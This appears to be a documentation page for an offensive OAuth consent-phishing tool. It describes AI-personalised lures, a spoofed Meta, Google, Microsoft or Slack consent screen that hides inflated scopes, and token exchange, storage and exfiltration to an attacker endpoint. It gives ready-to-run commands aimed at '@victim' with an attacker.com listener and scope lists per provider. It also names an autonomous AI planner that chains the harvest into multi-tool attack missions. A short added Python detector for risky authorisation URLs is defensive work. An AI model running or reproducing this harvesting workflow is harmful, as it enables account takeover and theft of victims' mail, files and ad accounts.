SPECTER SE-SOCIAL is a platform-agnostic OAuth token harvesting engine. AI-driven social engineering acquires OAuth tokens without prior access. LURE-GEN calls SPECTER PHANTOM to craft personalised lures, OAUTH-SERVER hosts a spoofed consent screen with scope inflation, TOKEN-EXCHANGE completes the code flow offline, SESSION-PERSIST stores long-lived tokens and outputs harvest commands for downstream tools.
Eight subsystems. One continuous OAuth harvest loop.
RECON: Profile enumeration via public APIs and OSINT. Maps the target's platform presence, connected apps, and OAuth grant history. Feeds LURE-GEN with personalised context for social engineering payload construction.
LURE-GEN: Calls the SPECTER PHANTOM subprocess to generate AI-personalised lures: copyright complaint, security alert, prize notification, or custom template. The lure includes a crafted OAuth authorisation URL pointing at the OAUTH-SERVER listener.
OAUTH-SERVER: Serves a spoofed provider consent screen (Meta, Google, Microsoft, Slack). Displays a narrow scope (e.g. email,public_profile) while the actual authorisation request carries full scope (e.g. ads_management,pages_manage_posts,instagram_basic).
TOKEN-EXCHANGE: Receives the authorisation code from the victim's browser redirect and completes the offline code-to-token exchange against the real provider API. Validates the token via /me/permissions and records all granted scopes in a TokenResult object.
SCOPE-INFLATION: Analyses the granted token's scope surface. Where incremental consent is possible, constructs a secondary lure for scope expansion. Flags any discrepancy between the displayed scope and the scope actually granted for the report.
SESSION-PERSIST: Stores harvested tokens in ~/.redspecter/ses_tokens.json. Under the UNLEASHED gate, performs long-lived token refresh via provider-specific endpoints (e.g. fb_exchange_token). Outputs ready-to-run harvest command strings for SPECTER META and SPECTER PHANTOM.
| Subsystem | Gate | Function |
|---|---|---|
| RECON | OPEN | Profile enumeration, connected app mapping, OSINT harvest |
| LURE-GEN | INJECT | AI-personalised lure generation via SPECTER PHANTOM subprocess |
| OAUTH-SERVER | INJECT | Spoofed consent screen server with scope inflation |
| TOKEN-EXCHANGE | INJECT | Offline authorisation code to access token exchange |
| SCOPE-INFLATION | INJECT | Scope gap analysis and incremental consent escalation |
| SESSION-PERSIST | INJECT | Token storage, long-lived refresh, harvest command output |
| EXFIL | UNLEASHED | Token exfiltration to attacker-controlled endpoint; unredacted in report |
| REPORT | OPEN | Ed25519-signed SES-{hex12} report with scope surface, WMD classification, token redacted unless UNLEASHED |
```bash
# Install
pip install -e /path/to/red-specter-specter-se-social

# Run full harvest chain (INJECT gate)
specter-se-social \
  --gate inject run \
  --target @victim \
  --provider meta \
  --app-id 123456789 \
  --app-secret abc123def456 \
  --lhost attacker.com

# Generate lure only
specter-se-social \
  --gate inject lure \
  --target @victim \
  --provider meta \
  --lhost attacker.com \
  --template copyright

# Start spoofed consent server
specter-se-social \
  --gate inject server \
  --provider meta \
  --app-id 123456789 \
  --app-secret abc123def456 \
  --lhost attacker.com \
  --port 8080

# Harvest + persist + output META command
specter-se-social \
  --gate inject run \
  --target @victim \
  --provider meta \
  --app-id 123456789 \
  --app-secret abc123def456 \
  --lhost attacker.com \
  --persist \
  --output token.json
```
| Gate | Flag | Capability |
|---|---|---|
| OPEN | --gate open | RECON, REPORT |
| INJECT | --gate inject | OPEN + LURE-GEN, OAUTH-SERVER, TOKEN-EXCHANGE, SCOPE-INFLATION, SESSION-PERSIST |
| UNLEASHED | --gate unleashed | INJECT + EXFIL (unredacted token in report, long-lived refresh enabled) |
oauth_mass_harvest consent_screen_hijack token_scope_inflation social_oauth_campaign
All reports are signed with the operator's Ed25519 private key at ~/.redspecter/override_private.pem. Report IDs follow the format SES-{12 hex chars}. Reports include: session ID, target, provider, gate, scopes displayed vs scopes granted, WMD classification, token (REDACTED at INJECT gate, plaintext at UNLEASHED), and Ed25519 signature.
| Version | Providers | Notes |
|---|---|---|
| v1.0 | Meta (Facebook/Instagram) | Full scope inflation: ads_management, pages_manage_posts, instagram_basic, whatsapp_business_management. Integrates with SPECTER META HARVEST. |
| v1.1 | Google, Microsoft | Google: gmail.readonly, drive, calendar. Microsoft: Mail.Read, Files.ReadWrite, Calendars.ReadWrite via MSAL. |
| v1.2 | Slack, GitHub, Dropbox | Slack: channels:read, files:write. GitHub: repo, read:org. Dropbox: files.content.write. |
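
For defenders, the scopes in the table above are the ones to watch for in OAuth authorisation requests. The following added example (not part of SPECTER SE-SOCIAL or the original page) parses authorisation URLs taken from mail-gateway or proxy logs and flags those that request these scopes with a redirect host outside an allowlist; the sample URLs, hostnames, client IDs and allowlist are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Scopes named in the version table above, lower-cased for comparison.
HIGH_RISK_SCOPES = {
    "ads_management", "pages_manage_posts", "instagram_basic",
    "whatsapp_business_management", "gmail.readonly", "drive", "calendar",
    "mail.read", "files.readwrite", "calendars.readwrite", "channels:read",
    "files:write", "repo", "read:org", "files.content.write",
}

def requested_scopes(query):
    """Normalise the scope parameter of a parsed authorisation query."""
    raw = " ".join(query.get("scope", []))
    # Meta separates scopes with commas; most other providers use spaces.
    parts = [p for p in re.split(r"[,\s]+", raw) if p]
    # URL-form scopes (Google, Microsoft Graph): keep the last path segment.
    return {p.rstrip("/").rsplit("/", 1)[-1].lower() for p in parts}

def review_authorize_url(url, allowed_redirect_hosts):
    """Alert when high-risk scopes go to a redirect host not on the allowlist."""
    query = parse_qs(urlsplit(url).query)
    redirect = query.get("redirect_uri", [""])[0]
    host = (urlsplit(redirect).hostname or "").lower()
    risky = sorted(requested_scopes(query) & HIGH_RISK_SCOPES)
    return {
        "client_id": query.get("client_id", [""])[0],
        "redirect_host": host,
        "risky_scopes": risky,
        "alert": bool(risky) and host not in allowed_redirect_hosts,
    }

# Constructed sample data: hostnames, client IDs and allowlist are placeholders.
ALLOWED_REDIRECT_HOSTS = {"sso.corp.example"}
SAMPLE_URLS = [
    "https://www.facebook.com/dialog/oauth?client_id=000000000000"
    "&redirect_uri=https%3A%2F%2Flogin.unknown.example%2Fcb&response_type=code"
    "&scope=email,public_profile,ads_management,pages_manage_posts",
    "https://accounts.google.com/o/oauth2/v2/auth?client_id=constructed-1"
    "&redirect_uri=https%3A%2F%2Fsso.corp.example%2Fcallback&scope=openid+email",
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=constructed-2&redirect_uri=https%3A%2F%2Fapp.unknown.example%2Fcb"
    "&scope=https%3A%2F%2Fgraph.microsoft.com%2FMail.Read+offline_access",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(review_authorize_url(u, ALLOWED_REDIRECT_HOSTS))
```
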
LURE-GEN invokes specter-phantom as a subprocess to generate AI-personalised social engineering lures. Requires SPECTER PHANTOM installed and accessible. Passes target profile data; receives lure text and metadata.
SESSION-PERSIST outputs a ready-to-run specter-meta harvest command string when provider is Meta. The harvested access token can be piped directly into SPECTER META's full ecosystem attack chain.
SPECTER SE-SOCIAL is included in the WARLORD PRIME NIGHTFALL manifest at INJECT gate. WARLORD PRIME's DeepSeek R1 planning engine can incorporate an OAuth harvest step into autonomous multi-tool mission chains.